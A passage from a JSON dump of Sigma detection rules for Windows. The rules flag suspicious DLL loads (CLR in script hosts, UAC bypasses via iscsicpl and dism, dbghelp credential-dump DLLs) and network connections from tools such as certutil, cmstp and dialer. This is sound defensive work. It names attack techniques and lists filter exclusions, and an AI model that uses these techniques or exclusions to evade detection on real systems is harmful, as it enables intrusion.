Legitimate Py2Exe Binaries\n    - Known false positive caused with Python Anaconda\n    - Various legitimate software is bundled from Python code into executables\nlevel: low\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml",
    "content": "title: DotNet CLR DLL Loaded By Scripting Applications\nid: 4508a70e-97ef-4300-b62b-ff27992990ea\nstatus: test\ndescription: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.\nreferences:\n    - https://github.com/tyranid/DotNetToJScript\n    - https://thewover.github.io/Introducing-Donut/\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n    - https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008\nauthor: omkar72, oscd.community\ndate: 2020-10-14\nmodified: 2023-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmstp.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\msxsl.exe'\n            - '\\regsvr32.exe'\n            # - '\\svchost.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n        ImageLoaded|endswith:\n            - '\\clr.dll'\n            - '\\mscoree.dll'\n            - '\\mscorlib.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_susp_unsigned_dll.yml",
    "content": "title: Unsigned DLL Loaded by Windows Utility\nid: b5de0c9a-6f19-43e0-af4e-55ad01f550af\nstatus: test\ndescription: |\n    Detects windows utilities loading an unsigned or untrusted DLL.\n    Adversaries often abuse those programs to proxy execution of malicious code.\nreferences:\n    - https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\n    - https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql\n    - https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-28\nmodified: 2025-10-07\ntags:\n    - attack.t1218.011\n    - attack.t1218.010\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith:\n            # Note: Add additional utilities that allow the loading of DLLs\n            - '\\InstallUtil.exe'\n            - '\\RegAsm.exe'\n            - '\\RegSvcs.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n    filter_main_signed:\n        Signed: 'true'\n    filter_main_sig_status:\n        SignatureStatus:\n            - 'errorChaining'\n            - 'errorCode_endpoint'\n            - 'errorExpired'\n            - 'trusted'\n            - 'Valid'\n    filter_main_signed_null:\n        Signed: null\n    filter_main_signed_empty:\n        Signed:\n            - ''\n            - '-'\n    filter_main_sig_status_null:\n        SignatureStatus: null\n    filter_main_sig_status_empty:\n        SignatureStatus:\n            - ''\n            - '-'\n    filter_main_windows_installer:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\rundll32.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n        ImageLoaded|startswith: 'C:\\Windows\\Installer\\'\n        ImageLoaded|endswith:\n            - '.tmp-\\Microsoft.Deployment.WindowsInstaller.dll'\n            - '.tmp-\\Avira.OE.Setup.CustomActions.dll'\n    
filter_main_assembly:\n        Image|startswith:\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework64'\n        Image|endswith: '\\RegAsm.exe'\n        ImageLoaded|endswith: '.dll'\n        ImageLoaded|startswith: 'C:\\Windows\\assembly\\NativeImages'\n    filter_optional_klite_codec:\n        Image:\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n        ImageLoaded|startswith:\n            - 'C:\\Program Files (x86)\\K-Lite Codec Pack\\'\n            - 'C:\\Program Files\\K-Lite Codec Pack\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_thor_unsigned_execution.yml",
    "content": "title: Suspicious Unsigned Thor Scanner Execution\nid: ea5c131b-380d-49f9-aeb3-920694da4d4b\nstatus: stable\ndescription: Detects loading and execution of an unsigned thor scanner binary.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-29\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n        ImageLoaded|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_main:\n        Signed: 'true'\n        SignatureStatus: 'valid'\n        Signature: 'Nextron Systems GmbH'\n    condition: selection and not filter_main\nfalsepositives:\n    - Other legitimate binaries named \"thor.exe\" that aren't published by Nextron Systems\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml",
    "content": "title: UAC Bypass Using Iscsicpl - ImageLoad\nid: 9ed5959a-c43c-4c59-84e3-d28628429456\nstatus: test\ndescription: Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%\nreferences:\n    - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n    - https://twitter.com/wdormann/status/1547583317410607110\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-17\nmodified: 2022-07-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image: C:\\Windows\\SysWOW64\\iscsicpl.exe\n        ImageLoaded|endswith: '\\iscsiexe.dll'\n    filter:\n        ImageLoaded|contains|all:\n            - 'C:\\Windows\\'\n            - 'iscsiexe.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_uac_bypass_via_dism.yml",
    "content": "title: UAC Bypass With Fake DLL\nid: a5ea83a7-05a5-44c1-be2e-addccbbd8c03\nstatus: test\ndescription: Attempts to load dismcore.dll after dropping it\nreferences:\n    - https://steemit.com/utopian-io/@ah101/uac-bypassing-utility\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-06\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dism.exe'\n        ImageLoaded|endswith: '\\dismcore.dll'\n    filter:\n        ImageLoaded: 'C:\\Windows\\System32\\Dism\\dismcore.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Actions of a legitimate telnet client\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml",
    "content": "title: MMC Loading Script Engines DLLs\nid: a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad\nstatus: experimental\ndescription: |\n    Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt\n    to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\n    - https://www.elastic.co/security-labs/grimresource\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.005\n    - attack.t1218.014\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\mmc.exe'\n        ImageLoaded|endswith:\n            - '\\vbscript.dll'\n            - '\\jscript.dll'\n            - '\\jscript9.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate MMC operations or extensions loading these libraries\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load.yml",
    "content": "title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location\nid: 416bc4a2-7217-4519-8dc7-c3271817f1d5\nrelated:\n    - id: 9f5c1d59-33be-4e60-bcab-85d2f566effd\n      type: similar\nstatus: experimental\ndescription: |\n    Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.\n    These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.\nreferences:\n    - https://blog.axelarator.net/hunting-for-edr-freeze/\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\nmodified: 2026-01-09\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection_img:\n        Image|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - '\\$Recycle.Bin\\'\n            - '\\Contacts\\'\n            # - '\\Desktop\\'\n            - '\\Documents\\'\n            # - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            #  - '\\AppData\\Local\\Temp\\' some installers may load from here\n    selection_dll:\n        ImageLoaded|endswith:\n            - '\\dbgcore.dll'\n            - '\\dbghelp.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: 
regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml\n"
  },
  {
    "path": "rules/windows/image_load/image_load_win_trusted_path_bypass.yml",
    "content": "title: Trusted Path Bypass via Windows Directory Spoofing\nid: 0cbe38c0-270c-41d9-ab79-6e5a9a669290\nrelated:\n    - id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g \"C:\\Windows \\System32\") which can bypass Windows trusted path verification.\n    This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.\nreferences:\n    - https://x.com/Wietze/status/1933495426952421843\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.007\n    - attack.t1548.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - ':\\Windows \\System32\\'  # Note the space between \"Windows\" and \"System32\"\n            - ':\\Windows \\SysWOW64\\'  # Note the space between \"Windows\" and \"SysWOW64\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml",
    "content": "title: WMI Persistence - Command Line Event Consumer\nid: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6\nstatus: test\ndescription: Detects WMI command line event consumers\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.t1546.003\n    - attack.persistence\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        ImageLoaded|endswith: '\\wbemcons.dll'\n    condition: selection\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml",
    "content": "title: WMIC Loading Scripting Libraries\nid: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\nrelated:\n    - id: 8d63dadf-b91b-4187-87b6-34a1114577ea\n      type: similar\n    - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n      type: similar\nstatus: test\ndescription: |\n    Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).\n    It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.\nreferences:\n    - https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html\n    - https://twitter.com/dez_/status/986614411711442944\n    - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-17\nmodified: 2022-10-13\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wmic.exe'\n        ImageLoaded|endswith:\n            - '\\jscript.dll'\n            - '\\vbscript.dll'\n    condition: selection\nfalsepositives:\n    - The command wmic os get lastbootuptime loads vbscript.dll\n    - The command wmic os get locale loads vbscript.dll\n    - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights\n    - The command `wmic ntevent` loads vbscript.dll\nlevel: medium\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: Wmiprvse Wbemcomn DLL Hijack\nid: 7707a579-e0d8-4886-a853-ce47e4575aaa\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\wmiprvse.exe'\n        ImageLoaded|endswith: '\\wbem\\wbemcomn.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/image_load/image_load_wsman_provider_image_load.yml",
    "content": "title: Suspicious WSMAN Provider Image Loads\nid: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94\nstatus: test\ndescription: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.\nreferences:\n    - https://twitter.com/chadtilbury/status/1275851297770610688\n    - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/\n    - https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture\n    - https://github.com/bohops/WSMan-WinRM\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-24\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    request_client:\n        - ImageLoaded|endswith:\n              - '\\WsmSvc.dll'\n              - '\\WsmAuto.dll'\n              - '\\Microsoft.WSMan.Management.ni.dll'\n        - OriginalFileName:\n              - 'WsmSvc.dll'\n              - 'WSMANAUTOMATION.DLL'\n              - 'Microsoft.WSMan.Management.dll'\n    respond_server:\n        Image|endswith: '\\svchost.exe'\n        OriginalFileName: 'WsmWmiPl.dll'\n    filter_general:\n        Image:\n            - 'C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe'\n            - 'C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\6\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\services.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_svchost: # not available in Sysmon data, but Aurora logs\n        CommandLine|contains:\n            - 'svchost.exe -k netsvcs -p -s BITS'\n        
    - 'svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc'\n            - 'svchost.exe -k NetworkService -p -s Wecsvc'\n            - 'svchost.exe -k netsvcs'\n    filter_mscorsvw: # Image: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\n        Image|startswith:\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v'\n        Image|endswith: '\\mscorsvw.exe'\n    filter_svr_2019:\n        Image:\n            - 'C:\\Windows\\System32\\Configure-SMRemoting.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n    filter_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n    filter_citrix:\n        Image|startswith: 'C:\\Program Files\\Citrix\\'\n    filter_upgrade:\n        Image|startswith: 'C:\\$WINDOWS.~BT\\Sources\\'\n    filter_mmc:\n        Image|endswith: '\\mmc.exe'\n    svchost:\n        Image|endswith: '\\svchost.exe'\n    commandline_null:\n        CommandLine: null\n    condition: ( request_client or respond_server ) and not 1 of filter* and not ( svchost and commandline_null )\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_addinutil_initiated.yml",
    "content": "title: Network Connection Initiated By AddinUtil.EXE\nid: 5205613d-2a63-4412-a895-3a2458b587b3\nstatus: test\ndescription: |\n    Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\n    This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.\nreferences:\n    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\nauthor: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)\ndate: 2023-09-18\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\addinutil.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml",
    "content": "title: Uncommon Connection to Active Directory Web Services\nid: b3ad3c0f-c949-47a1-a30e-b0491ccae876\nstatus: test\ndescription: |\n    Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.\nreferences:\n    - https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c\n    - https://github.com/FalconForceTeam/FalconFriday/blob/a9219dfcfd89836f34660223f47d766982bdce46/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md\nauthor: '@kostastsale'\ndate: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1087\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: true\n        DestinationPort: 9389\n    filter_main_dsac:\n        Image: 'C:\\Windows\\system32\\dsac.exe'\n    filter_main_ms_monitoring_agent:\n        Image: 'C:\\Program Files\\Microsoft Monitoring Agent\\'\n    filter_main_powershell:\n        Image|startswith:\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml",
    "content": "title: Uncommon Network Connection Initiated By Certutil.EXE\nid: 0dba975d-a193-4ed1-a067-424df57570d1\nstatus: test\ndescription: |\n    Detects a network connection initiated by the certutil.exe utility.\n    Attackers can abuse the utility in order to download malware or additional payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-09-02\nmodified: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\certutil.exe'\n        Initiated: 'true'\n        DestinationPort:\n            - 80\n            - 135\n            - 443\n            - 445\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Cmstp.EXE\nid: efafe0bf-4238-479e-af8f-797bd3490d2d\nstatus: test\ndescription: |\n    Detects a network connection initiated by Cmstp.EXE\n    Its uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\nmodified: 2024-05-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmstp.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\n# Note: Please report any false positive seen in the wild to help tune the rule.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Microsoft Dialer\nid: 37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1\nstatus: test\ndescription: |\n    Detects outbound network connection initiated by Microsoft Dialer.\n    The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\n    This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is \"Rhadamanthys\"\nreferences:\n    - https://tria.ge/240301-rk34sagf5x/behavioral2\n    - https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d\n    - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n    - https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html\nauthor: CertainlyP\ndate: 2024-04-26\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: ':\\Windows\\System32\\dialer.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false 
positives.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml",
    "content": "title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process\nid: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83\nrelated:\n    - id: e043f529-8514-4205-8ab0-7f7d2927b400\n      type: derived\nstatus: test\ndescription: |\n    Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\nreferences:\n    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\n    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\nmodified: 2024-07-16\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1102.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: 'azurewebsites.net'\n    # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations\n    # Note: To avoid complex conditions the filters for some apps are generic by name only. 
A custom tuning is recommended for best results\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_chrome_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_firefox_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_safari:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\Safari\\'\n            - 'C:\\Program Files\\Safari\\'\n        Image|endswith: '\\safari.exe'\n    filter_main_defender:\n        Image|contains:\n            - 'C:\\Program Files\\Windows Defender Advanced Threat Protection\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        
Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_main_prtg:\n        # Paessler's PRTG Network Monitor\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n            - 'C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe'\n    filter_main_brave:\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n        Image|endswith: '\\brave.exe'\n    filter_main_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_main_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_main_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    # Note: The TOR browser shouldn't be something you allow in your corporate network.\n    # filter_main_tor:\n    #     Image|contains: '\\Tor Browser\\'\n    filter_main_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_main_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_main_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: 
